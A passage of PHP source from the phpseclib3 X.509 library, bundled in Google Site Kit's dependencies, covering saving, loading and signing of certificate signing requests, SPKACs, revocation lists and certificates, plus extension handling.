!($algorithm = $this->subArray($csr, 'certificationRequestInfo/subjectPKInfo/algorithm/algorithm')): case \is_object($csr['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey']): break; default: $csr['certificationRequestInfo']['subjectPKInfo'] = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\base64_decode(\preg_replace('#-.+-|[\\r\\n]#', '', $csr['certificationRequestInfo']['subjectPKInfo']['subjectPublicKey']))); } $filters = []; $filters['certificationRequestInfo']['subject']['rdnSequence']['value'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $this->mapOutDNs($csr, 'certificationRequestInfo/subject/rdnSequence'); $this->mapOutAttributes($csr, 'certificationRequestInfo/attributes'); $csr = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($csr, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificationRequest::MAP); switch ($format) { case self::FORMAT_DER: return $csr; // case self::FORMAT_PEM: default: return "-----BEGIN CERTIFICATE REQUEST-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($csr), 64) . '-----END CERTIFICATE REQUEST-----'; } } /** * Load a SPKAC CSR * * SPKAC's are produced by the HTML5 keygen element: * * https://developer.mozilla.org/en-US/docs/HTML/Element/keygen * * @param string $spkac * @return mixed */ public function loadSPKAC($spkac) { if (\is_array($spkac) && isset($spkac['publicKeyAndChallenge'])) { unset($this->currentCert); unset($this->currentKeyIdentifier); unset($this->signatureSubject); $this->currentCert = $spkac; return $spkac; } // see http://www.w3.org/html/wg/drafts/html/master/forms.html#signedpublickeyandchallenge // OpenSSL produces SPKAC's that are preceded by the string SPKAC= $temp = \preg_replace('#(?:SPKAC=)|[ \\r\\n\\\\]#', '', $spkac); $temp = \preg_match('#^[a-zA-Z\\d/+]*={0,2}$#', $temp) ? \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_decode($temp) : \false; if ($temp != \false) { $spkac = $temp; } $orig = $spkac; if ($spkac === \false) { $this->currentCert = \false; return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($spkac); if (!$decoded) { $this->currentCert = \false; return \false; } $spkac = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SignedPublicKeyAndChallenge::MAP); if (!isset($spkac) || !\is_array($spkac)) { $this->currentCert = \false; return \false; } $this->signatureSubject = \substr($orig, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); $key = $spkac['publicKeyAndChallenge']['spki']; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SubjectPublicKeyInfo::MAP); $spkac['publicKeyAndChallenge']['spki']['subjectPublicKey'] = "-----BEGIN PUBLIC KEY-----\r\n" . \chunk_split(\base64_encode($key), 64) . "-----END PUBLIC KEY-----"; $this->currentKeyIdentifier = null; $this->currentCert = $spkac; $this->publicKey = null; $this->publicKey = $this->getPublicKey(); return $spkac; } /** * Save a SPKAC CSR request * * @param array $spkac * @param int $format optional * @return string */ public function saveSPKAC(array $spkac, $format = self::FORMAT_PEM) { if (!\is_array($spkac) || !isset($spkac['publicKeyAndChallenge'])) { return \false; } $algorithm = $this->subArray($spkac, 'publicKeyAndChallenge/spki/algorithm/algorithm'); switch (\true) { case !$algorithm: case \is_object($spkac['publicKeyAndChallenge']['spki']['subjectPublicKey']): break; default: $spkac['publicKeyAndChallenge']['spki'] = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element(\base64_decode(\preg_replace('#-.+-|[\\r\\n]#', '', $spkac['publicKeyAndChallenge']['spki']['subjectPublicKey']))); } $spkac = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($spkac, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\SignedPublicKeyAndChallenge::MAP); switch ($format) { case self::FORMAT_DER: return $spkac; // case self::FORMAT_PEM: default: // OpenSSL's implementation of SPKAC requires the SPKAC be preceded by SPKAC= and since there are pretty much // no other SPKAC decoders phpseclib will use that same format return 'SPKAC=' . \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($spkac); } } /** * Load a Certificate Revocation List * * @param string $crl * @param int $mode * @return mixed */ public function loadCRL($crl, $mode = self::FORMAT_AUTO_DETECT) { if (\is_array($crl) && isset($crl['tbsCertList'])) { $this->currentCert = $crl; unset($this->signatureSubject); return $crl; } if ($mode != self::FORMAT_DER) { $newcrl = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::extractBER($crl); if ($mode == self::FORMAT_PEM && $crl == $newcrl) { return \false; } $crl = $newcrl; } $orig = $crl; if ($crl === \false) { $this->currentCert = \false; return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($crl); if (!$decoded) { $this->currentCert = \false; return \false; } $crl = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificateList::MAP); if (!isset($crl) || $crl === \false) { $this->currentCert = \false; return \false; } $this->signatureSubject = \substr($orig, $decoded[0]['content'][0]['start'], $decoded[0]['content'][0]['length']); $this->mapInDNs($crl, 'tbsCertList/issuer/rdnSequence'); if ($this->isSubArrayValid($crl, 'tbsCertList/crlExtensions')) { $this->mapInExtensions($crl, 'tbsCertList/crlExtensions'); } if ($this->isSubArrayValid($crl, 'tbsCertList/revokedCertificates')) { $rclist_ref =& $this->subArrayUnchecked($crl, 'tbsCertList/revokedCertificates'); if ($rclist_ref) { $rclist = $crl['tbsCertList']['revokedCertificates']; foreach ($rclist as $i => $extension) { if ($this->isSubArrayValid($rclist, "{$i}/crlEntryExtensions")) { $this->mapInExtensions($rclist_ref, "{$i}/crlEntryExtensions"); } } } } $this->currentKeyIdentifier = null; $this->currentCert = $crl; return $crl; } /** * Save Certificate Revocation List. * * @param array $crl * @param int $format optional * @return string */ public function saveCRL(array $crl, $format = self::FORMAT_PEM) { if (!\is_array($crl) || !isset($crl['tbsCertList'])) { return \false; } $filters = []; $filters['tbsCertList']['issuer']['rdnSequence']['value'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; $filters['tbsCertList']['signature']['parameters'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; $filters['signatureAlgorithm']['parameters'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_UTF8_STRING]; if (empty($crl['tbsCertList']['signature']['parameters'])) { $filters['tbsCertList']['signature']['parameters'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NULL]; } if (empty($crl['signatureAlgorithm']['parameters'])) { $filters['signatureAlgorithm']['parameters'] = ['type' => \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_NULL]; } \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::setFilters($filters); $this->mapOutDNs($crl, 'tbsCertList/issuer/rdnSequence'); $this->mapOutExtensions($crl, 'tbsCertList/crlExtensions'); $rclist =& $this->subArray($crl, 'tbsCertList/revokedCertificates'); if (\is_array($rclist)) { foreach ($rclist as $i => $extension) { $this->mapOutExtensions($rclist, "{$i}/crlEntryExtensions"); } } $crl = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($crl, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\CertificateList::MAP); switch ($format) { case self::FORMAT_DER: return $crl; // case self::FORMAT_PEM: default: return "-----BEGIN X509 CRL-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($crl), 64) . '-----END X509 CRL-----'; } } /** * Helper function to build a time field according to RFC 3280 section * - 4.1.2.5 Validity * - 5.1.2.4 This Update * - 5.1.2.5 Next Update * - 5.1.2.6 Revoked Certificates * by choosing utcTime iff year of date given is before 2050 and generalTime else. * * @param string $date in format date('D, d M Y H:i:s O') * @return array|Element */ private function timeField($date) { if ($date instanceof \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element) { return $date; } $dateObj = new \DateTimeImmutable($date, new \DateTimeZone('GMT')); $year = $dateObj->format('Y'); // the same way ASN1.php parses this if ($year < 2050) { return ['utcTime' => $date]; } else { return ['generalTime' => $date]; } } /** * Sign an X.509 certificate * * $issuer's private key needs to be loaded. * $subject can be either an existing X.509 cert (if you want to resign it), * a CSR or something with the DN and public key explicitly set. * * @return mixed */ public function sign(\Google\Site_Kit_Dependencies\phpseclib3\File\X509 $issuer, \Google\Site_Kit_Dependencies\phpseclib3\File\X509 $subject) { if (!\is_object($issuer->privateKey) || empty($issuer->dn)) { return \false; } if (isset($subject->publicKey) && !($subjectPublicKey = $subject->formatSubjectPublicKey())) { return \false; } $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($issuer->privateKey); if (isset($subject->currentCert) && \is_array($subject->currentCert) && isset($subject->currentCert['tbsCertificate'])) { $this->currentCert = $subject->currentCert; $this->currentCert['tbsCertificate']['signature'] = $signatureAlgorithm; $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; if (!empty($this->startDate)) { $this->currentCert['tbsCertificate']['validity']['notBefore'] = $this->timeField($this->startDate); } if (!empty($this->endDate)) { $this->currentCert['tbsCertificate']['validity']['notAfter'] = $this->timeField($this->endDate); } if (!empty($this->serialNumber)) { $this->currentCert['tbsCertificate']['serialNumber'] = $this->serialNumber; } if (!empty($subject->dn)) { $this->currentCert['tbsCertificate']['subject'] = $subject->dn; } if (!empty($subject->publicKey)) { $this->currentCert['tbsCertificate']['subjectPublicKeyInfo'] = $subjectPublicKey; } $this->removeExtension('id-ce-authorityKeyIdentifier'); if (isset($subject->domains)) { $this->removeExtension('id-ce-subjectAltName'); } } elseif (isset($subject->currentCert) && \is_array($subject->currentCert) && isset($subject->currentCert['tbsCertList'])) { return \false; } else { if (!isset($subject->publicKey)) { return \false; } $startDate = new \DateTimeImmutable('now', new \DateTimeZone(@\date_default_timezone_get())); $startDate = !empty($this->startDate) ? $this->startDate : $startDate->format('D, d M Y H:i:s O'); $endDate = new \DateTimeImmutable('+1 year', new \DateTimeZone(@\date_default_timezone_get())); $endDate = !empty($this->endDate) ? $this->endDate : $endDate->format('D, d M Y H:i:s O'); /* "The serial number MUST be a positive integer" "Conforming CAs MUST NOT use serialNumber values longer than 20 octets." -- https://tools.ietf.org/html/rfc5280#section-4.1.2.2 for the integer to be positive the leading bit needs to be 0 hence the application of a bitmap */ $serialNumber = !empty($this->serialNumber) ? $this->serialNumber : new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string(20) & "" . \str_repeat("\xff", 19), 256); $this->currentCert = ['tbsCertificate' => [ 'version' => 'v3', 'serialNumber' => $serialNumber, // $this->setSerialNumber() 'signature' => $signatureAlgorithm, 'issuer' => \false, // this is going to be overwritten later 'validity' => [ 'notBefore' => $this->timeField($startDate), // $this->setStartDate() 'notAfter' => $this->timeField($endDate), ], 'subject' => $subject->dn, 'subjectPublicKeyInfo' => $subjectPublicKey, ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => \false]; // Copy extensions from CSR. $csrexts = $subject->getAttribute('pkcs-9-at-extensionRequest', 0); if (!empty($csrexts)) { $this->currentCert['tbsCertificate']['extensions'] = $csrexts; } } $this->currentCert['tbsCertificate']['issuer'] = $issuer->dn; if (isset($issuer->currentKeyIdentifier)) { $this->setExtension('id-ce-authorityKeyIdentifier', [ //'authorityCertIssuer' => array( // array( // 'directoryName' => $issuer->dn // ) //), 'keyIdentifier' => $issuer->currentKeyIdentifier, ]); //$extensions = &$this->currentCert['tbsCertificate']['extensions']; //if (isset($issuer->serialNumber)) { // $extensions[count($extensions) - 1]['authorityCertSerialNumber'] = $issuer->serialNumber; //} //unset($extensions); } if (isset($subject->currentKeyIdentifier)) { $this->setExtension('id-ce-subjectKeyIdentifier', $subject->currentKeyIdentifier); } $altName = []; if (isset($subject->domains) && \count($subject->domains)) { $altName = \array_map(['\\Google\\Site_Kit_Dependencies\\phpseclib3\\File\\X509', 'dnsName'], $subject->domains); } if (isset($subject->ipAddresses) && \count($subject->ipAddresses)) { // should an IP address appear as the CN if no domain name is specified? idk //$ips = count($subject->domains) ? $subject->ipAddresses : array_slice($subject->ipAddresses, 1); $ipAddresses = []; foreach ($subject->ipAddresses as $ipAddress) { $encoded = $subject->ipAddress($ipAddress); if ($encoded !== \false) { $ipAddresses[] = $encoded; } } if (\count($ipAddresses)) { $altName = \array_merge($altName, $ipAddresses); } } if (!empty($altName)) { $this->setExtension('id-ce-subjectAltName', $altName); } if ($this->caFlag) { $keyUsage = $this->getExtension('id-ce-keyUsage'); if (!$keyUsage) { $keyUsage = []; } $this->setExtension('id-ce-keyUsage', \array_values(\array_unique(\array_merge($keyUsage, ['cRLSign', 'keyCertSign'])))); $basicConstraints = $this->getExtension('id-ce-basicConstraints'); if (!$basicConstraints) { $basicConstraints = []; } $this->setExtension('id-ce-basicConstraints', \array_merge(['cA' => \true], $basicConstraints), \true); if (!isset($subject->currentKeyIdentifier)) { $this->setExtension('id-ce-subjectKeyIdentifier', $this->computeKeyIdentifier($this->currentCert), \false, \false); } } // resync $this->signatureSubject // save $tbsCertificate in case there are any \phpseclib3\File\ASN1\Element objects in it $tbsCertificate = $this->currentCert['tbsCertificate']; $this->loadX509($this->saveX509($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\x00" . $issuer->privateKey->sign($this->signatureSubject); $result['tbsCertificate'] = $tbsCertificate; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Sign a CSR * * @return mixed */ public function signCSR() { if (!\is_object($this->privateKey) || empty($this->dn)) { return \false; } $origPublicKey = $this->publicKey; $this->publicKey = $this->privateKey->getPublicKey(); $publicKey = $this->formatSubjectPublicKey(); $this->publicKey = $origPublicKey; $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($this->privateKey); if (isset($this->currentCert) && \is_array($this->currentCert) && isset($this->currentCert['certificationRequestInfo'])) { $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; if (!empty($this->dn)) { $this->currentCert['certificationRequestInfo']['subject'] = $this->dn; } $this->currentCert['certificationRequestInfo']['subjectPKInfo'] = $publicKey; } else { $this->currentCert = ['certificationRequestInfo' => ['version' => 'v1', 'subject' => $this->dn, 'subjectPKInfo' => $publicKey, 'attributes' => []], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => \false]; } // resync $this->signatureSubject // save $certificationRequestInfo in case there are any \phpseclib3\File\ASN1\Element objects in it $certificationRequestInfo = $this->currentCert['certificationRequestInfo']; $this->loadCSR($this->saveCSR($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\x00" . $this->privateKey->sign($this->signatureSubject); $result['certificationRequestInfo'] = $certificationRequestInfo; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Sign a SPKAC * * @return mixed */ public function signSPKAC() { if (!\is_object($this->privateKey)) { return \false; } $origPublicKey = $this->publicKey; $this->publicKey = $this->privateKey->getPublicKey(); $publicKey = $this->formatSubjectPublicKey(); $this->publicKey = $origPublicKey; $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($this->privateKey); // re-signing a SPKAC seems silly but since everything else supports re-signing why not? if (isset($this->currentCert) && \is_array($this->currentCert) && isset($this->currentCert['publicKeyAndChallenge'])) { $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; $this->currentCert['publicKeyAndChallenge']['spki'] = $publicKey; if (!empty($this->challenge)) { // the bitwise AND ensures that the output is a valid IA5String $this->currentCert['publicKeyAndChallenge']['challenge'] = $this->challenge & \str_repeat("", \strlen($this->challenge)); } } else { $this->currentCert = ['publicKeyAndChallenge' => [ 'spki' => $publicKey, // quoting <https://developer.mozilla.org/en-US/docs/Web/HTML/Element/keygen>, // "A challenge string that is submitted along with the public key. Defaults to an empty string if not specified." // both Firefox and OpenSSL ("openssl spkac -key private.key") behave this way // we could alternatively do this instead if we ignored the specs: // Random::string(8) & str_repeat("\x7F", 8) 'challenge' => !empty($this->challenge) ? $this->challenge : '', ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => \false]; } // resync $this->signatureSubject // save $publicKeyAndChallenge in case there are any \phpseclib3\File\ASN1\Element objects in it $publicKeyAndChallenge = $this->currentCert['publicKeyAndChallenge']; $this->loadSPKAC($this->saveSPKAC($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\x00" . $this->privateKey->sign($this->signatureSubject); $result['publicKeyAndChallenge'] = $publicKeyAndChallenge; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Sign a CRL * * $issuer's private key needs to be loaded. * * @return mixed */ public function signCRL(\Google\Site_Kit_Dependencies\phpseclib3\File\X509 $issuer, \Google\Site_Kit_Dependencies\phpseclib3\File\X509 $crl) { if (!\is_object($issuer->privateKey) || empty($issuer->dn)) { return \false; } $currentCert = isset($this->currentCert) ? $this->currentCert : null; $signatureSubject = isset($this->signatureSubject) ? $this->signatureSubject : null; $signatureAlgorithm = self::identifySignatureAlgorithm($issuer->privateKey); $thisUpdate = new \DateTimeImmutable('now', new \DateTimeZone(@\date_default_timezone_get())); $thisUpdate = !empty($this->startDate) ? $this->startDate : $thisUpdate->format('D, d M Y H:i:s O'); if (isset($crl->currentCert) && \is_array($crl->currentCert) && isset($crl->currentCert['tbsCertList'])) { $this->currentCert = $crl->currentCert; $this->currentCert['tbsCertList']['signature'] = $signatureAlgorithm; $this->currentCert['signatureAlgorithm'] = $signatureAlgorithm; } else { $this->currentCert = ['tbsCertList' => [ 'version' => 'v2', 'signature' => $signatureAlgorithm, 'issuer' => \false, // this is going to be overwritten later 'thisUpdate' => $this->timeField($thisUpdate), ], 'signatureAlgorithm' => $signatureAlgorithm, 'signature' => \false]; } $tbsCertList =& $this->currentCert['tbsCertList']; $tbsCertList['issuer'] = $issuer->dn; $tbsCertList['thisUpdate'] = $this->timeField($thisUpdate); if (!empty($this->endDate)) { $tbsCertList['nextUpdate'] = $this->timeField($this->endDate); // $this->setEndDate() } else { unset($tbsCertList['nextUpdate']); } if (!empty($this->serialNumber)) { $crlNumber = $this->serialNumber; } else { $crlNumber = $this->getExtension('id-ce-cRLNumber'); // "The CRL number is a non-critical CRL extension that conveys a // monotonically increasing sequence number for a given CRL scope and // CRL issuer. This extension allows users to easily determine when a // particular CRL supersedes another CRL." // -- https://tools.ietf.org/html/rfc5280#section-5.2.3 $crlNumber = $crlNumber !== \false ? $crlNumber->add(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1)) : null; } $this->removeExtension('id-ce-authorityKeyIdentifier'); $this->removeExtension('id-ce-issuerAltName'); // Be sure version >= v2 if some extension found. $version = isset($tbsCertList['version']) ? $tbsCertList['version'] : 0; if (!$version) { if (!empty($tbsCertList['crlExtensions'])) { $version = 'v2'; // v2. } elseif (!empty($tbsCertList['revokedCertificates'])) { foreach ($tbsCertList['revokedCertificates'] as $cert) { if (!empty($cert['crlEntryExtensions'])) { $version = 'v2'; // v2. } } } if ($version) { $tbsCertList['version'] = $version; } } // Store additional extensions. if (!empty($tbsCertList['version'])) { // At least v2. if (!empty($crlNumber)) { $this->setExtension('id-ce-cRLNumber', $crlNumber); } if (isset($issuer->currentKeyIdentifier)) { $this->setExtension('id-ce-authorityKeyIdentifier', [ //'authorityCertIssuer' => array( // ] // 'directoryName' => $issuer->dn // ] //), 'keyIdentifier' => $issuer->currentKeyIdentifier, ]); //$extensions = &$tbsCertList['crlExtensions']; //if (isset($issuer->serialNumber)) { // $extensions[count($extensions) - 1]['authorityCertSerialNumber'] = $issuer->serialNumber; //} //unset($extensions); } $issuerAltName = $this->getExtension('id-ce-subjectAltName', $issuer->currentCert); if ($issuerAltName !== \false) { $this->setExtension('id-ce-issuerAltName', $issuerAltName); } } if (empty($tbsCertList['revokedCertificates'])) { unset($tbsCertList['revokedCertificates']); } unset($tbsCertList); // resync $this->signatureSubject // save $tbsCertList in case there are any \phpseclib3\File\ASN1\Element objects in it $tbsCertList = $this->currentCert['tbsCertList']; $this->loadCRL($this->saveCRL($this->currentCert)); $result = $this->currentCert; $this->currentCert['signature'] = $result['signature'] = "\x00" . $issuer->privateKey->sign($this->signatureSubject); $result['tbsCertList'] = $tbsCertList; $this->currentCert = $currentCert; $this->signatureSubject = $signatureSubject; return $result; } /** * Identify signature algorithm from key settings * * @param PrivateKey $key * @throws UnsupportedAlgorithmException if the algorithm is unsupported * @return array */ private static function identifySignatureAlgorithm(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey $key) { if ($key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA) { if ($key->getPadding() & \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::SIGNATURE_PSS) { $r = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS::load($key->withPassword()->toString('PSS')); return ['algorithm' => 'id-RSASSA-PSS', 'parameters' => \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS::savePSSParams($r)]; } switch ($key->getHash()) { case 'md2': case 'md5': case 'sha1': case 'sha224': case 'sha256': case 'sha384': case 'sha512': return ['algorithm' => $key->getHash() . 'WithRSAEncryption', 'parameters' => null]; } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash algorithms for RSA are: md2, md5, sha1, sha224, sha256, sha384, sha512'); } if ($key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA) { switch ($key->getHash()) { case 'sha1': case 'sha224': case 'sha256': return ['algorithm' => 'id-dsa-with-' . $key->getHash()]; } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash algorithms for DSA are: sha1, sha224, sha256'); } if ($key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC) { switch ($key->getCurve()) { case 'Ed25519': case 'Ed448': return ['algorithm' => 'id-' . $key->getCurve()]; } switch ($key->getHash()) { case 'sha1': case 'sha224': case 'sha256': case 'sha384': case 'sha512': return ['algorithm' => 'ecdsa-with-' . \strtoupper($key->getHash())]; } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported hash algorithms for EC are: sha1, sha224, sha256, sha384, sha512'); } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException('The only supported public key classes are: RSA, DSA, EC'); } /** * Set certificate start date * * @param \DateTimeInterface|string $date */ public function setStartDate($date) { if (!\is_object($date) || !$date instanceof \DateTimeInterface) { $date = new \DateTimeImmutable($date, new \DateTimeZone(@\date_default_timezone_get())); } $this->startDate = $date->format('D, d M Y H:i:s O'); } /** * Set certificate end date * * @param \DateTimeInterface|string $date */ public function setEndDate($date) { /* To indicate that a certificate has no well-defined expiration date, the notAfter SHOULD be assigned the GeneralizedTime value of 99991231235959Z. -- http://tools.ietf.org/html/rfc5280#section-4.1.2.5 */ if (\is_string($date) && \strtolower($date) === 'lifetime') { $temp = '99991231235959Z'; $temp = \chr(\Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::TYPE_GENERALIZED_TIME) . \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeLength(\strlen($temp)) . $temp; $this->endDate = new \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element($temp); } else { if (!\is_object($date) || !$date instanceof \DateTimeInterface) { $date = new \DateTimeImmutable($date, new \DateTimeZone(@\date_default_timezone_get())); } $this->endDate = $date->format('D, d M Y H:i:s O'); } } /** * Set Serial Number * * @param string $serial * @param int $base optional */ public function setSerialNumber($serial, $base = -256) { $this->serialNumber = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($serial, $base); } /** * Turns the certificate into a certificate authority * */ public function makeCA() { $this->caFlag = \true; } /** * Check for validity of subarray * * This is intended for use in conjunction with _subArrayUnchecked(), * implementing the checks included in _subArray() but without copying * a potentially large array by passing its reference by-value to is_array(). * * @param array $root * @param string $path * @return boolean */ private function isSubArrayValid(array $root, $path) { if (!\is_array($root)) { return \false; } foreach (\explode('/', $path) as $i) { if (!\is_array($root)) { return \false; } if (!isset($root[$i])) { return \true; } $root = $root[$i]; } return \true; } /** * Get a reference to a subarray * * This variant of _subArray() does no is_array() checking, * so $root should be checked with _isSubArrayValid() first. * * This is here for performance reasons: * Passing a reference (i.e. $root) by-value (i.e. to is_array()) * creates a copy. If $root is an especially large array, this is expensive. * * @param array $root * @param string $path absolute path with / as component separator * @param bool $create optional * @return array|false */ private function &subArrayUnchecked(array &$root, $path, $create = \false) { $false = \false; foreach (\explode('/', $path) as $i) { if (!isset($root[$i])) { if (!$create) { return $false; } $root[$i] = []; } $root =& $root[$i]; } return $root; } /** * Get a reference to a subarray * * @param array $root * @param string $path absolute path with / as component separator * @param bool $create optional * @return array|false */ private function &subArray(&$root, $path, $create = \false) { $false = \false; if (!\is_array($root)) { return $false; } foreach (\explode('/', $path) as $i) { if (!\is_array($root)) { return $false; } if (!isset($root[$i])) { if (!$create) { return $false; } $root[$i] = []; } $root =& $root[$i]; } return $root; } /** * Get a reference to an extension subarray * * @param array $root * @param string $path optional absolute path with / as component separator * @param bool $create optional * @return array|false */ private function &extensions(&$root, $path = null, $create = \false) { if (!isset($root)) { $root = $this->currentCert; } switch (\true) { case !empty($path): case !\is_array($root): break; case isset($root['tbsCertificate']): $path = 'tbsCertificate/extensions'; break; case isset($root['tbsCertList']): $path = 'tbsCertList/crlExtensions'; break; case isset($root['certificationRequestInfo']): $pth = 'certificationRequestInfo/attributes'; $attributes =& $this->subArray($root, $pth, $create); if (\is_array($attributes)) { foreach ($attributes as $key => $value) { if ($value['type'] == 'pkcs-9-at-extensionRequest') { $path = "{$pth}/{$key}/value/0"; break 2; } } if ($create) { $key = \count($attributes); $attributes[] = ['type' => 'pkcs-9-at-extensionRequest', 'value' => []]; $path = "{$pth}/{$key}/value/0"; } } break; } $extensions =& $this->subArray($root, $path, $create); if (!\is_array($extensions)) { $false = \false; return $false; } return $extensions; } /** * Remove an Extension * * @param string $id * @param string $path optional * @return bool */ private function removeExtensionHelper($id, $path = null) { $extensions =& $this->extensions($this->currentCert, $path); if (!\is_array($extensions)) { return \false; } $result = \false; foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { unset($extensions[$key]); $result = \true; } } $extensions = \array_values($extensions); // fix for https://bugs.php.net/75433 affecting PHP 7.2 if (!isset($extensions[0])) { $extensions = \array_splice($extensions, 0, 0); } return $result; } /** * Get an Extension * * Returns the extension if it exists and false if not * * @param string $id * @param array $cert optional * @param string $path optional * @return mixed */ private function getExtensionHelper($id, $cert = null, $path = null) { $extensions = $this->extensions($cert, $path); if (!\is_array($extensions)) { return \false; } foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { return $value['extnValue']; } } return \false; } /** * Returns a list of all extensions in use * * @param array $cert optional * @param string $path optional * @return array */ private function getExtensionsHelper($cert = null, $path = null) { $exts = $this->extensions($cert, $path); $extensions = []; if (\is_array($exts)) { foreach ($exts as $extension) { $extensions[] = $extension['extnId']; } } return $extensions; } /** * Set an Extension * * @param string $id * @param mixed $value * @param bool $critical optional * @param bool $replace optional * @param string $path optional * @return bool */ private function setExtensionHelper($id, $value, $critical = \false, $replace = \true, $path = null) { $extensions =& $this->extensions($this->currentCert, $path, \true); if (!\is_array($extensions)) { return \false; } $newext = ['extnId' => $id, 'critical' => $critical, 'extnValue' => $value]; foreach ($extensions as $key => $value) { if ($value['extnId'] == $id) { if (!$replace) { return \false; } $extensions[$key] = $newext; return \true; } } $extensions[] = $newext; return \true; } /** * Remove a certificate, CSR or CRL Extension * * @param string $id * @return bool */ public function removeExtension($id) { return $this->removeExtensionHelper($id); } /** * Get a certificate, CSR or CRL Extension * * Returns the extension if it exists and false if not * * @param string $id * @param array $cert optional * @param string $path * @return mixed */ public function getExtension($id, $cert = null, $path = null) { return $this->getExtensionHelper($id, $cert, $path); } /** * Returns a list of all extensions in use in certificate, CSR or CRL * * @param array $cert optional * @param string $path optional * @return array */ public function getExtensions($cert = null, $path = null) { return $this->getExtensionsHelper($cert, $path); } /** * Set a certificate, CSR or CRL Extension * * @param string $id * @param mixed $value * @param bool $critical optional * @param bool $replace optional * @return bool */ public function setExtension($id, $value, $critical = \false, $replace = \true) { return $this->setExtensionHelper($id, $value, $critical, $replace); } /** * Remove a CSR attribute. * * @param string $id * @param int $disposition optional * @return bool */ public function removeAttribute($id, $disposition = self::ATTR_ALL) { $attributes =& $this->subArray($this->currentCert, 'certificationRequestInfo/attributes'); if (!\is_array($attributes)) { return \false; } $result = \false; foreach ($attributes as $key => $attribute) { if ($attribute['type'] == $id) { $n = \count($attribute['value']); switch (\true) { case $disposition == self::ATTR_APPEND: case $disposition == self::ATTR_REPLACE: return \false; case $disposition >= 